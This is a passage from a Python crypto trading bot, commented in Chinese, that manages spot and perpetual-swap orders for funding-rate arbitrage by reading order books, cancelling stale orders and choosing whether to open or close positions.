Necessary_info[h]['Predict_Funding_Rate'] = float(Swap_Funding_Rate[0]['nextFundingRate'])
except:
pass
# Funding_Rate
record_minute = new_record_minute
time.sleep(0.3) #避免过度提取ws
#每小时更新present_funding_rate
new_record_hour = Nowtime.hour
if new_record_hour != record_hour:
try:
instId_fu, Necessary_info[h]['Present_Funding_Rate'],Necessary_info[h]['Predict_Funding_Rate'] = funding_recalculate(i + '-SWAP')
except:
pass
time.sleep(0.3) #避免过度提取ws
record_hour = new_record_hour
#swap中间价
Operation_info[h]['new_swap_bids_price5'] = []
Operation_info[h]['new_swap_asks_price5'] = []
try:
Operation_info[h]['new_swap_depth5'] = MQ[h]["DEPTH5_SWAP"].get(timeout=1)
except:
try:
Operation_info[h]['new_swap_depth5'] = Operation_info[h]['new_swap_depth5']
except:
Operation_info[h]['new_swap_depth5'] = marketAPI.get_orderbook(h + '-SWAP', '5')['data']
time.sleep(0.1)
for i in range(5):
Operation_info[h]['new_swap_bids_price5'].append(float(Operation_info[h]['new_swap_depth5'][0]['bids'][i][0]))
Operation_info[h]['new_swap_asks_price5'].append(float(Operation_info[h]['new_swap_depth5'][0]['asks'][i][0]))
new_swap_bid=float(Operation_info[h]['new_swap_bids_price5'][0])
new_swap_ask=float(Operation_info[h]['new_swap_asks_price5'][0])
swap_present_price = precfloat((new_swap_ask + new_swap_bid)/2,Necessary_info[h]['swap_tick_digit']) #这里先用swap_present_price,没用new_swap_present_price
#new spot中间价
Operation_info[h]['new_spot_bids_price5'] = []
Operation_info[h]['new_spot_asks_price5'] = []
try:
Operation_info[h]['new_spot_depth5'] = MQ[h]["DEPTH5_SPOT"].get(timeout=0.5)
# print('我spot_depth5还是用WS___5')
except:
try:
Operation_info[h]['new_spot_depth5']=Operation_info[h]['new_spot_depth5']
except:
Operation_info[h]['new_spot_depth5']=marketAPI.get_orderbook(h, '5')['data']
time.sleep(0.1)
print('h_1',h)
print('我spot_depth5还是用restAPI___5')
for i in range(5):
Operation_info[h]['new_spot_bids_price5'].append(float(Operation_info[h]['new_spot_depth5'][0]['bids'][i][0]))
Operation_info[h]['new_spot_asks_price5'].append(float(Operation_info[h]['new_spot_depth5'][0]['asks'][i][0]))
new_spot_bid = float(Operation_info[h]['new_spot_bids_price5'][0])
new_spot_ask = float(Operation_info[h]['new_spot_asks_price5'][0])
new_spot_present_price = precfloat((new_spot_ask + new_spot_bid)/2,Necessary_info[h]['spot_tick_digit'])
#现货指数
try:
spot_index_tickers = MQ[h]["INDEX_TICKERS_SPOT"].get(timeout=0.5)
spot_index_price = float(spot_index_tickers[0]['idxPx'])
except:
ticker_result = marketAPI.get_index_ticker(instId=h)['data']
time.sleep(0.2)
spot_index_price = float(ticker_result[0]['idxPx'])
#swap标记价格
try:
swap_mark_prices = MQ[h]["MARK_PRICE_SWAP"].get(timeout=0.5)
swap_mark_price = float(swap_mark_prices[0]['markPx'])
except:
swap_mark_prices = publicAPI.get_mark_price('SWAP')['data']
time.sleep(0.2)
for i in swap_mark_prices:
instr = i["instId"].split("-")
TP = instr[0] + "-" + instr[1]
if TP == h:
swap_mark_price=float(i['markPx'])
#swap_size,spot_size
if Necessary_info[h]['swap_min_size'] * Necessary_info[h]['contract_val']*swap_present_price > order_limit: #看usdt swap最少出手的价值,如果超过order_limit就直接是swap_min_size
swap_size = Necessary_info[h]['swap_min_size']
spot_size = Necessary_info[h]['swap_min_size']*Necessary_info[h]['contract_val'] #考虑到合约可能是张,但是在spot这里要换算成几个币,所以*contract_val
swap_close_size = swap_size * close_short_index
spot_close_size = spot_size * close_short_index
elif Necessary_info[h]['swap_min_size'] * Necessary_info[h]['contract_val']*swap_present_price < order_limit: #看usdt swap最少出手的价值,如果没超过order_limit就计算
swap_size = round(order_limit/(swap_present_price * Necessary_info[h]['contract_val']))
spot_size = round(order_limit/new_spot_present_price)
swap_close_size = swap_size * close_short_index
spot_close_size = spot_size * close_short_index
# 处理剩馀swap订单
pending_swap_revoke_mode = 'off'
if Operation_info[h]['swap_pending_list_left'] == 'on':
time.sleep(0.1)
Operation_info[h]['swap_pending_order_result'] = tradeAPI.get_order_list(instId=Necessary_info[h]['swap_instrument_id'])['data']
#print('swap_left_result',Operation_info[h]['swap_pending_order_result'])
if len(Operation_info[h]['swap_pending_order_result']) == 0: # 表示已经没有未成交单子
Operation_info[h]['swap_pending_list_left'] = 'off'
else:
if len(Operation_info[h]['swap_pending_order_result']) > 2: # 有两张以上的单,全撤
print('重复下单') # 这里以后做个钉钉通知
tutu = h + '-SWAP,v5有多馀的挂单没撤掉,现在全撤'
# sendmessage(tutu)
pending_swap_revoke_mode = 'on'
else: # 一张未完成单,继续
# 做出当下五档差别的判断
Operation_info[h]['new_swap_bids_price5'] = []
Operation_info[h]['new_swap_asks_price5'] = []
try:
Operation_info[h]['new_swap_depth5'] = MQ[h]["DEPTH5_SWAP"].get(timeout=1)
new_swap_depth5=Operation_info[h]['new_swap_depth5']
except:
try:
Operation_info[h]['new_swap_depth5'] = Operation_info[h]['new_swap_depth5']
new_swap_depth5=Operation_info[h]['new_swap_depth5']
except:
Operation_info[h]['new_swap_depth5'] = marketAPI.get_orderbook(h + '-SWAP', '5')['data']
new_swap_depth5=Operation_info[h]['new_swap_depth5']
time.sleep(0.1)
for i in range(5):
Operation_info[h]['new_swap_bids_price5'].append(float(new_swap_depth5[0]['bids'][i][0]))
Operation_info[h]['new_swap_asks_price5'].append(float(new_swap_depth5[0]['asks'][i][0]))
# 如果五档变化了,撤单
if Operation_info[h]['swap_bids_price5'][:3] != Operation_info[h]['new_swap_bids_price5'][:3] or Operation_info[h]['swap_asks_price5'][:3] != Operation_info[h]['new_swap_asks_price5'][:3]:
pending_swap_revoke_mode = 'on'
# 如果五档没有变化
elif Operation_info[h]['swap_bids_price5'][:3] == Operation_info[h]['new_swap_bids_price5'][:3] and Operation_info[h]['swap_asks_price5'][:3] == Operation_info[h]['new_swap_asks_price5'][:3]:
if Operation_info[h]['swap_pending_order_result'][0]['side'] == 'sell':
# 看是不是best价
if float(Operation_info[h]['swap_pending_order_result'][0]['px']) == float(new_swap_depth5[0]['asks'][0][0]):
# 再看是不是唯一单,是就撤单
if float(new_swap_depth5[0]['asks'][0][3]) == 1:
pending_swap_revoke_mode = 'on'
# elif float(Operation_info[h]['swap_pending_order_result'][0]['px']) != float(new_swap_depth5[0]['asks'][0][0]): #不是best价格,但现在不一定一直要挂在best价,所以不必撤单 0827
# pending_swap_revoke_mode = 'on'
elif Operation_info[h]['swap_pending_order_result'][0]['side'] == 'buy':
if float(Operation_info[h]['swap_pending_order_result'][0]['px']) == float(new_swap_depth5[0]['bids'][0][0]):
if float(new_swap_depth5[0]['bids'][0][3]) == 1:
pending_swap_revoke_mode = 'on'
# elif float(Operation_info[h]['swap_pending_order_result'][0]['px']) != float(new_swap_depth5[0]['bids'][0][0]):
# pending_swap_revoke_mode = 'on'
if pending_swap_revoke_mode == 'on':
order_id_list=[]
if len(Operation_info[h]['swap_pending_order_result']) != 0:
for i in Operation_info[h]['swap_pending_order_result']:
uncomplete_orderId = i['ordId']
uncomplete_order_instId = i['instId']
key_list = []
value_list = []
key_list = ["instId", "ordId"]
value_list = [uncomplete_order_instId, uncomplete_orderId]
dictionary_uncomplete_order = dict(zip(key_list, value_list))
order_id_list.append(dictionary_uncomplete_order)
if len(order_id_list) != 0:
swap_revoke_result = tradeAPI.cancel_multiple_orders(order_id_list)
#print('swap_revoke_result_1',swap_revoke_result)
Operation_info[h]['swap_pending_list_left'] = 'off'
# 使旧的swap五档=新的swap五档
Operation_info[h]['swap_bids_price5'][:5] = Operation_info[h]['new_swap_bids_price5'][:5]
Operation_info[h]['swap_asks_price5'][:5] = Operation_info[h]['new_swap_asks_price5'][:5]
# 处理剩馀spot订单
pending_spot_revoke_mode = 'off'
if Operation_info[h]['spot_pending_list_left'] == 'on':
time.sleep(0.1)
Operation_info[h]['spot_pending_order_result'] = tradeAPI.get_order_list(instId=Necessary_info[h]['spot_instrument_id'])['data']
# print('spot_left_result',Operation_info[h]['spot_pending_order_result'])
if len(Operation_info[h]['spot_pending_order_result']) == 0: # 表示已经没有未成交单子
Operation_info[h]['spot_pending_list_left'] = 'off'
else:
if len(Operation_info[h]['spot_pending_order_result']) > 2: # 有两张以上的单,全撤
tutu = h + '-SPOT,v5有多馀的挂单没撤掉,现在全撤'
# sendmessage(tutu)
print('spot repeat order') # 这里以后做个钉钉通知
pending_spot_revoke_mode ='on'
else: # 一张未完成单,继续
# 做出当下五档差别的判断
Operation_info[h]['new_spot_bids_price5'] = []
Operation_info[h]['new_spot_asks_price5'] = []
try:
Operation_info[h]['new_spot_depth5']= MQ[h]["DEPTH5_SPOT"].get(timeout=0.5)
new_spot_depth5=Operation_info[h]['new_spot_depth5']
# print('我spot_depth5还是用ws___4')
except:
try:
Operation_info[h]['new_spot_depth5']=Operation_info[h]['new_spot_depth5']
new_spot_depth5=Operation_info[h]['new_spot_depth5']
except:
Operation_info[h]['new_spot_depth5'] = marketAPI.get_orderbook(h, '5')['data']
new_spot_depth5=Operation_info[h]['new_spot_depth5']
print('h_23',h)
print('我spot_depth5还是用restAPI___4')
time.sleep(0.1)
for i in range(5):
Operation_info[h]['new_spot_bids_price5'].append(float(new_spot_depth5[0]['bids'][i][0]))
Operation_info[h]['new_spot_asks_price5'].append(float(new_spot_depth5[0]['asks'][i][0]))
# 如果五档变化了,撤单
if Operation_info[h]['spot_bids_price5'][:3] != Operation_info[h]['new_spot_bids_price5'][:3] or Operation_info[h]['spot_asks_price5'][:3] != Operation_info[h]['new_spot_asks_price5'][:3]:
pending_spot_revoke_mode = 'on'
# 如果五档没有变化
elif Operation_info[h]['spot_bids_price5'][:3] == Operation_info[h]['new_spot_bids_price5'][:3] and Operation_info[h]['spot_asks_price5'][:3] == Operation_info[h]['new_spot_asks_price5'][:3]:
if Operation_info[h]['spot_pending_order_result'][0]['side'] == 'sell': # 看是不是best价
if float(Operation_info[h]['spot_pending_order_result'][0]['px']) == float(new_spot_depth5[0]['asks'][0][0]): # 再看是不是唯一单,是就撤单
if float(new_spot_depth5[0]['asks'][0][3]) == 1:
pending_spot_revoke_mode = 'on'
# Operation_info[h]['spot_pending_list_left'] = 'off'
# elif float(Operation_info[h]['spot_pending_order_result'][0]['px']) != float(new_spot_depth5[0]['asks'][0][0]): #不是best价格,但现在不一定一直要挂在best价,所以不必撤单 0827
# pending_spot_revoke_mode = 'on'
elif Operation_info[h]['spot_pending_order_result'][0]['side'] == 'buy':
if float(Operation_info[h]['spot_pending_order_result'][0]['px']) == float(new_spot_depth5[0]['bids'][0][0]):
if float(new_spot_depth5[0]['bids'][0][3]) == 1:
pending_spot_revoke_mode = 'on'
# elif float(Operation_info[h]['spot_pending_order_result'][0]['px']) != float(new_spot_depth5[0]['asks'][0][0]):
# pending_spot_revoke_mode = 'on'
if pending_spot_revoke_mode == 'on': # 其他mode就不管
order_id_list=[]
for i in Operation_info[h]['spot_pending_order_result']:
uncomplete_orderId = i['ordId']
uncomplete_order_instId = i['instId']
key_list = []
value_list = []
key_list = ["instId", "ordId"]
value_list = [uncomplete_order_instId, uncomplete_orderId]
dictionary_uncomplete_order = dict(zip(key_list, value_list))
order_id_list.append(dictionary_uncomplete_order)
if len(order_id_list) != 0:
spot_revoke_result = tradeAPI.cancel_multiple_orders(order_id_list)
#print('spot_revoke_result_2',spot_revoke_result)
Operation_info[h]['spot_pending_list_left'] = 'off'
# 使旧的spot五档=新的spot五档
Operation_info[h]['spot_bids_price5'][:5] = Operation_info[h]['new_spot_bids_price5'][:5]
Operation_info[h]['spot_asks_price5'][:5] = Operation_info[h]['new_spot_asks_price5'][:5]
# 如果不撤單,就不用下单
if Operation_info[h]['swap_pending_list_left'] == 'on' or Operation_info[h]['spot_pending_list_left'] == 'on': # 要看有没有剩馀的单
no_pending_order='off' #拿掉大涨跟持仓差的影响
So_Sc_mode='off' #拿掉So_Sc_mode的影响
#找出TA
Target_Amount = Necessary_info[h]['Total_money']/new_spot_present_price
#print('h',h)
#print('Target_Amount',Target_Amount)
#找spot_balance,swap_position
# 找spot_balance
try:
spot_dic = AQ[h]["POSITION_SPOT"].get(timeout=0.5)
Operation_info[h]['spot_balance'] = float(spot_dic['cashBal'])
if Operation_info[h]['spot_balance'] == 0:
Operation_info[h]['spot_balance'] = float(accountAPI.get_account(h.split('-')[0])['data'][0]['details'][0]['cashBal'])
time.sleep(0.5)
except:
total_spot_dic = accountAPI.get_account()['data'][0]['details']
time.sleep(0.5)
spot_cc_list=[]
if len(total_spot_dic)!=0:
for i in total_spot_dic:
TP=i['ccy']+'-USDT'
spot_cc_list.append(TP)
if h in spot_cc_list:
instr_fu = h.split('-')
for i in total_spot_dic:
if i['ccy']==instr_fu[0]:
Operation_info[h]['spot_dic'] = i
spot_dic = Operation_info[h]['spot_dic']
Operation_info[h]['spot_balance'] = float(spot_dic['cashBal'])
else:
Operation_info[h]['spot_balance']=0
else:
Operation_info[h]['spot_balance']=0
# 找swap持仓数
try:
swap_dic = AQ[h]["POSITION_SWAP"].get(timeout=0.5)
Operation_info[h]['swap_position'] = float(swap_dic['pos'])
if Operation_info[h]['swap_position'] ==0:
Operation_info[h]['swap_position']= float(accountAPI.get_positions(instId=h+'-SWAP')['data'][0]['pos'])
time.sleep(0.5)
except:
total_swap_dic = accountAPI.get_positions('SWAP')['data']
time.sleep(0.5)
swap_cc_list=[]
if len(total_swap_dic)!=0:
for i in total_swap_dic:
TP=i['instId'].split(i['instId'][-5:])[0]
swap_cc_list.append(TP)
if h in swap_cc_list:
for i in total_swap_dic:
instr_fu = i['instId'].split('-')
if instr_fu[0] + "-" + instr_fu[1] == h:
Operation_info[h]['swap_dic'] = i
swap_dic = Operation_info[h]['swap_dic']
Operation_info[h]['swap_position'] = float(swap_dic['pos'])
else:
Operation_info[h]['swap_position']=0
else:
Operation_info[h]['swap_position']=0
#print(Operation_info[h]['spot_balance'] * new_spot_present_price > Necessary_info[h]['Total_money'] * 1.05)
# 加入大涨调仓判断,大涨后要尽速平仓
if no_pending_order == 'on': #先看有没有遗留单,有就不走调仓判断
if Operation_info[h]['spot_balance'] > 0 : #这时候是spot开多,swap开空
if Operation_info[h]['spot_balance'] * new_spot_present_price > Necessary_info[h]['Total_money'] * 1.2:
So_Sc_mode = 'off'
# mode_open_long_judge = {'Target_Amount': Target_Amount,
# 'spot_balance': Operation_info[h]['spot_balance'],
# 'swap_position': Operation_info[h]['swap_position'],
# 'swap_size': swap_size,
# 'spot_size': spot_size,
# 'contract_value':Necessary_info[h]['contract_val']}
mode_close_long_judge = {'Target_Amount_Close': 0, # Target_Amount_Close這裡設等於0
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_close_size': swap_close_size,
'spot_close_size': spot_close_size,
'predict_funding': Necessary_info[h]['Predict_Funding_Rate'],
'present_funding': Necessary_info[h]['Present_Funding_Rate'],
'So_Sc_mode': So_Sc_mode,
'contract_value':Necessary_info[h]['contract_val']}
# open_long_mode, open_long_final_open_mode, open_long_final_close_mode = open_long_judge(mode_open_long_judge)
close_long_mode, close_long_final_open_mode, close_long_final_close_mode = close_long_judge(mode_close_long_judge)
elif Operation_info[h]['spot_balance'] < 0 : #这时候是spot开空,swap开多
if Operation_info[h]['spot_balance'] * new_spot_present_price < Necessary_info[h]['Total_money'] * -1.5:
So_Sc_mode = 'off'
#查询开负仓还有多少可开
# max_avail_size_result = float(accountAPI.get_max_avail_size(h,'cross')['data'][0]['availSell'])
# time.sleep(0.1)
# swap_instrumentId = h + '-SWAP'
# funding_rate_result = publicAPI.get_funding_rate(swap_instrumentId)['data'][0]
# time.sleep(0.2)
# if abs(float(funding_rate_result['fundingRate']) + float(funding_rate_result['nextFundingRate']) )< 0.05 / 100: # 借币日利率
# 小于的话就不要开仓,抵不过借币日利率
# Target_Amount=0
# elif max_avail_size_result < spot_size:
#TA就等于目前的spot_balance然后不要增加
# Target_Amount= abs(Operation_info[h]['spot_balance']) #因为在def会*-1,所以这里加上abs
# else:
# pass #照常通过,继续开spot负仓
# mode_open_short_judge = {'Target_Amount': Target_Amount,
# 'spot_balance': Operation_info[h]['spot_balance'],
# 'swap_position': Operation_info[h]['swap_position'],
# 'swap_size': swap_size,
# 'spot_size': spot_size,
# 'contract_value':Necessary_info[h]['contract_val']}
mode_close_short_judge = {'Target_Amount_Close': 0, # Target_Amount_Close這裡設等於0
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_close_size': swap_close_size,
'spot_close_size': spot_close_size,
'predict_funding': Necessary_info[h]['Predict_Funding_Rate'],
'present_funding': Necessary_info[h]['Present_Funding_Rate'],
'So_Sc_mode': So_Sc_mode,
'contract_value':Necessary_info[h]['contract_val']}
# open_short_mode, open_short_final_open_mode, open_short_final_close_mode = open_short_judge(mode_open_short_judge)
close_short_mode, close_short_final_open_mode, close_short_final_close_mode = close_short_judge(mode_close_short_judge)
if swap_mark_price > spot_index_price: # 可以开正仓,先没加commission
#So=10
#Sc=-10
So = swap_mark_price - spot_index_price # So是正数
Sc = spot_index_price - swap_mark_price # Sc没必要
elif spot_index_price > swap_mark_price: # 可以开负仓
#So=-10
#Sc=10
So = swap_mark_price - spot_index_price # So没必要
Sc = spot_index_price - swap_mark_price # Sc是正数
elif spot_index_price == swap_mark_price:
So=0
Sc=0
So_Sc_mode ='off'
# 持仓差的调整
# print('h_1',h)
# print('spot_balance_23',Operation_info[h]['spot_balance'] )
# print('swap_position_23',Operation_info[h]['swap_position'] )
# print('contract_val_234',Necessary_info[h]['contract_val'])
# print(abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])*new_spot_present_price > (tolerate_limit*1.3 ))
# print('no_pending_order',no_pending_order)
if no_pending_order == 'on': # 先看有没有遗留单,有就不走持仓差调整
if abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])*new_spot_present_price > (tolerate_limit*1.5 ):
So_Sc_mode = 'off'
if swap_mark_price >= spot_index_price:
# if Operation_info[h]['spot_balance'] > 0: #现在是开正仓
#评判跟著So_Sc的路线走
if Necessary_info[h]['Present_Funding_Rate'] >= 0:
mode_open_long_judge = {'Target_Amount': Target_Amount,
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_size': swap_size,
'spot_size': spot_size,
'contract_value':Necessary_info[h]['contract_val']}
#开正仓
open_long_mode, open_long_final_open_mode, open_long_final_close_mode = open_long_judge(mode_open_long_judge) # 开仓模式
elif Necessary_info[h]['Present_Funding_Rate'] < 0: #虽然<0,还是先选择开正仓
mode_close_short_judge = {'Target_Amount_Close': 0,
# Target_Amount_Close這裡設等於0
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h][
'swap_position'],
'swap_close_size': swap_close_size,
'spot_close_size': spot_close_size,
'predict_funding': Necessary_info[h][
'Predict_Funding_Rate'],
'present_funding': Necessary_info[h][
'Present_Funding_Rate'],
'So_Sc_mode': So_Sc_mode,
'contract_value':Necessary_info[h]['contract_val']}
# 平负仓
close_short_mode, close_short_final_open_mode, close_short_final_close_mode = close_short_judge(mode_close_short_judge)
elif swap_mark_price < spot_index_price:
if Necessary_info[h]['Present_Funding_Rate'] >= 0:
mode_close_long_judge = {'Target_Amount_Close': 0,
# Target_Amount_Close這裡設等於0
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h][
'swap_position'],
'swap_close_size': swap_close_size,
'spot_close_size': spot_close_size,
'predict_funding': Necessary_info[h]['Predict_Funding_Rate'],
'present_funding': Necessary_info[h]['Present_Funding_Rate'],
'So_Sc_mode': So_Sc_mode,
'contract_value':Necessary_info[h]['contract_val']}
# 平正仓
close_long_mode, close_long_final_open_mode, close_long_final_close_mode = close_long_judge(mode_close_long_judge)
elif Necessary_info[h]['Present_Funding_Rate'] < 0:
max_avail_size_result = float(accountAPI.get_max_avail_size(h, 'cross')['data'][0]['availSell'])
time.sleep(0.1)
if max_avail_size_result < spot_size:
if abs(Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) > abs(Operation_info[h]['spot_balance']):
# 已经没法继续开负仓,然后永续合约多于现货仓位,TA就等于目前的spot_balance然后不要增加,平swap的仓位
Target_Amount_Close = abs(Operation_info[h]['spot_balance'])
mode_close_short_judge = {'Target_Amount_Close': Target_Amount_Close, # Target_Amount_Close這裡設等於spot_balance
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_close_size': swap_close_size,
'spot_close_size': spot_close_size,
'predict_funding': Necessary_info[h]['Predict_Funding_Rate'],
'present_funding': Necessary_info[h]['Present_Funding_Rate'],
'So_Sc_mode': So_Sc_mode,
'contract_value':Necessary_info[h]['contract_val']}
#平负仓
close_short_mode, close_short_final_open_mode, close_short_final_close_mode = close_short_judge(mode_close_short_judge)
elif abs(Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) < abs(Operation_info[h]['spot_balance']):
# 已经没法继续开负仓,然后现货约多于合约仓位,TA就等于目前的spot_balance然后不要增加,建swap的仓位
Target_Amount = abs(Operation_info[h]['spot_balance'])
mode_open_short_judge = {'Target_Amount': Target_Amount,
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_size': swap_size,
'spot_size': spot_size,
'contract_value':Necessary_info[h]['contract_val']}
# 开负仓
open_short_mode, open_short_final_open_mode, open_short_final_close_mode = open_short_judge(mode_open_short_judge)
else:#还可以继续开负仓
mode_open_short_judge = {'Target_Amount': Target_Amount,
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_size': swap_size,
'spot_size': spot_size,
'contract_value':Necessary_info[h]['contract_val']}
# 开负仓
open_short_mode, open_short_final_open_mode, open_short_final_close_mode = open_short_judge(mode_open_short_judge)
# elif Operation_info[h]['spot_balance'] < 0: #现在是开负仓
# if abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])*new_spot_present_price > (tolerate_limit*1.5):
# max_avail_size_result = float(accountAPI.get_max_avail_size(h, 'cross')['data'][0]['availSell'])
# time.sleep(0.1)
# if max_avail_size_result < spot_size:
# So_Sc_mode = 'off'
# if abs(Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) > abs(Operation_info[h]['spot_balance']):
# 已经没法继续开负仓,然后永续合约多于现货仓位,TA就等于目前的spot_balance然后不要增加,平swap的仓位
# Target_Amount_Close = abs(Operation_info[h]['spot_balance'])
# mode_close_short_judge = {'Target_Amount_Close': Target_Amount_Close, # Target_Amount_Close這裡設等於spot_balance
# 'spot_balance': Operation_info[h]['spot_balance'],
# 'swap_position': Operation_info[h]['swap_position'],
# 'swap_close_size': swap_close_size,
# 'spot_close_size': spot_close_size,
# 'predict_funding': Necessary_info[h][
# 'Predict_Funding_Rate'],
# 'present_funding': Necessary_info[h][
# 'Present_Funding_Rate'],
# 'So_Sc_mode': So_Sc_mode,
# 'contract_value':Necessary_info[h]['contract_val']}
# close_short_mode, close_short_final_open_mode, close_short_final_close_mode = close_short_judge(mode_close_short_judge)
# elif abs(Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) < abs(Operation_info[h]['spot_balance']):
# 已经没法继续开负仓,然后现货约多于合约仓位,TA就等于目前的spot_balance然后不要增加,建swap的仓位
# Target_Amount = abs(Operation_info[h]['spot_balance'])
# mode_open_short_judge = {'Target_Amount': Target_Amount,
# 'spot_balance': Operation_info[h]['spot_balance'],
# 'swap_position': Operation_info[h]['swap_position'],
# 'swap_size': swap_size,
# 'spot_size': spot_size,
# 'contract_value':Necessary_info[h]['contract_val']}
# 开负仓
# open_short_mode, open_short_final_open_mode, open_short_final_close_mode = open_short_judge(mode_open_short_judge)
# else:#还可以继续开负仓
# So_Sc_mode = 'off'
# mode_open_short_judge = {'Target_Amount': Target_Amount,
# 'spot_balance': Operation_info[h]['spot_balance'],
# 'swap_position': Operation_info[h]['swap_position'],
# 'swap_size': swap_size,
# 'spot_size': spot_size,
# 'contract_value':Necessary_info[h]['contract_val']}
# 开负仓
# open_short_mode, open_short_final_open_mode, open_short_final_close_mode = open_short_judge(mode_open_short_judge)
# elif Operation_info[h]['position_direction']=='close': #现在是平仓方向
# if Operation_info[h]['spot_balance'] > 0: # 这时候是spot开多,swap开空
# if abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])*new_spot_present_price > (tolerate_limit*1.5):
# print('here_check_tilt')
# 持仓差超过tolerate_limit*1.3时启动,跳过So_Sc_mode,可能会有资金不足,所以选择平仓,
# So_Sc_mode = 'off'
# mode_close_long_judge = {'Target_Amount_Close': 0, # Target_Amount_Close這裡設等於0
# 'spot_balance': Operation_info[h]['spot_balance'],
# 'swap_position': Operation_info[h]['swap_position'],
# 'swap_close_size': swap_close_size,
# 'spot_close_size': spot_close_size,
# 'predict_funding': Necessary_info[h]['Predict_Funding_Rate'],
# 'present_funding': Necessary_info[h]['Present_Funding_Rate'],
# 'So_Sc_mode': So_Sc_mode,
# 'contract_value':Necessary_info[h]['contract_val']}
# open_long_mode, open_long_final_open_mode, open_long_final_close_mode = open_long_judge(mode_open_long_judge)
# close_long_mode, close_long_final_open_mode, close_long_final_close_mode = close_long_judge(mode_close_long_judge)
# elif Operation_info[h]['spot_balance'] < 0: # 这时候是spot开空,swap开多
# if abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])*new_spot_present_price> (tolerate_limit*1.5):
# 持仓差超过tolerate_limit*1.3时启动,跳过So_Sc_mode,可能有spot无法继续卖,所以选择平仓模式
# So_Sc_mode = 'off'
# mode_close_short_judge = {'Target_Amount_Close': 0, # Target_Amount_Close這裡設等於0
# 'spot_balance': Operation_info[h]['spot_balance'],
# 'swap_position': Operation_info[h]['swap_position'],
# 'swap_close_size': swap_close_size,
# 'spot_close_size': spot_close_size,
# 'predict_funding': Necessary_info[h][
# 'Predict_Funding_Rate'],
# 'present_funding': Necessary_info[h][
# 'Present_Funding_Rate'],
# 'So_Sc_mode': So_Sc_mode,
# 'contract_value':Necessary_info[h]['contract_val']}
# close_short_mode, close_short_final_open_mode, close_short_final_close_mode = close_short_judge(mode_close_short_judge)
#print('So_Sc_mode_2',So_Sc_mode)
#print('open_long_mode_2345',open_long_mode)
#print('open_short_mode_2345',open_short_mode)
#print('close_long_mode',close_long_mode)
#print('close_short_mode',close_short_mode)
mode_So_Sc = {'maker_commission_spot': maker_commission_spot,
'taker_commission_spot': taker_commission_spot,
'maker_commission_swap': maker_commission_swap,
'taker_commission_swap': taker_commission_swap,
'swap_present_price': swap_present_price,
'spot_index_price': spot_index_price #这改用现货指数,不用中间价'spot_present_price': new_spot_present_price
}
#So, Sc = make_So_Sc(mode_So_Sc)
#print('swap_present_price',swap_present_price)
#print('spot_index_price',spot_index_price)
#print('So_Sc_mode_3',So_Sc_mode)
# swap_present_price=35
# spot_index_price=35.6
if swap_mark_price > spot_index_price: # 可以开正仓,先没加commission
#So=10
#Sc=-10
So = swap_mark_price - spot_index_price # So是正数
Sc = spot_index_price - swap_mark_price # Sc没必要
elif spot_index_price > swap_mark_price: # 可以开负仓
#So=-10
#Sc=10
So = swap_mark_price - spot_index_price # So没必要
Sc = spot_index_price - swap_mark_price # Sc是正数
elif spot_index_price == swap_mark_price:
So=0
Sc=0
So_Sc_mode ='off'
#print('h',h)
#print('So',So)
#加上若盘口(best ask跟bid)之间价差比例 <0.001 就不要下单
# if (new_swap_ask - new_swap_bid)/swap_present_price< 2*Necessary_info[h]['spot_tick_size'] or (new_spot_ask-new_spot_bid)<2*Necessary_info[h]['swap_tick_size']:
# if Necessary_info[h]['spot_tick_size'] / new_spot_present_price <0.0001 or Necessary_info[h]['swap_tick_size'] / swap_present_price <0.0001:
# So_Sc_mode = 'off'
#以下是正常流程
if no_pending_order == 'on':
if So_Sc_mode =='on':
if swap_mark_price > spot_index_price:
if Necessary_info[h]['Present_Funding_Rate'] >= 0:
if So > Necessary_info[h]['Present_Funding_Rate'] * spot_index_price:
swap_instrumentId = h + '-SWAP'
funding_rate_result = publicAPI.get_funding_rate(swap_instrumentId)['data'][0]
time.sleep(0.2)
# 如果目前资金费率<0,且加上下期资金费率小于负千一,就不要开正仓
if float(funding_rate_result['fundingRate']) < 0 and float(funding_rate_result['fundingRate']) + float(funding_rate_result['nextFundingRate']) < 0.001:
pass
else:
mode_open_long_judge = {'Target_Amount': Target_Amount,
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_size': swap_size,
'spot_size': spot_size,
'contract_value':Necessary_info[h]['contract_val']}
#开正仓
open_long_mode, open_long_final_open_mode, open_long_final_close_mode = open_long_judge(mode_open_long_judge) # 开仓模式
elif Necessary_info[h]['Present_Funding_Rate'] < 0:
#让平仓增加2倍难度
if So/2 > -1* Necessary_info[h]['Present_Funding_Rate'] * spot_index_price:
swap_instrumentId = h + '-SWAP'
funding_rate_result = publicAPI.get_funding_rate(swap_instrumentId)['data'][0]
time.sleep(0.2)
if float(funding_rate_result['fundingRate']) < 0 and float(funding_rate_result['fundingRate']) + float(funding_rate_result['nextFundingRate']) < 0.001:
pass
else:
#平均资金费率要大于万三
if abs(Necessary_info[h]['Present_Funding_Rate']) > 0.0003:
mode_close_short_judge = {'Target_Amount_Close': 0,
# Target_Amount_Close這裡設等於0
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h][
'swap_position'],
'swap_close_size': swap_close_size,
'spot_close_size': spot_close_size,
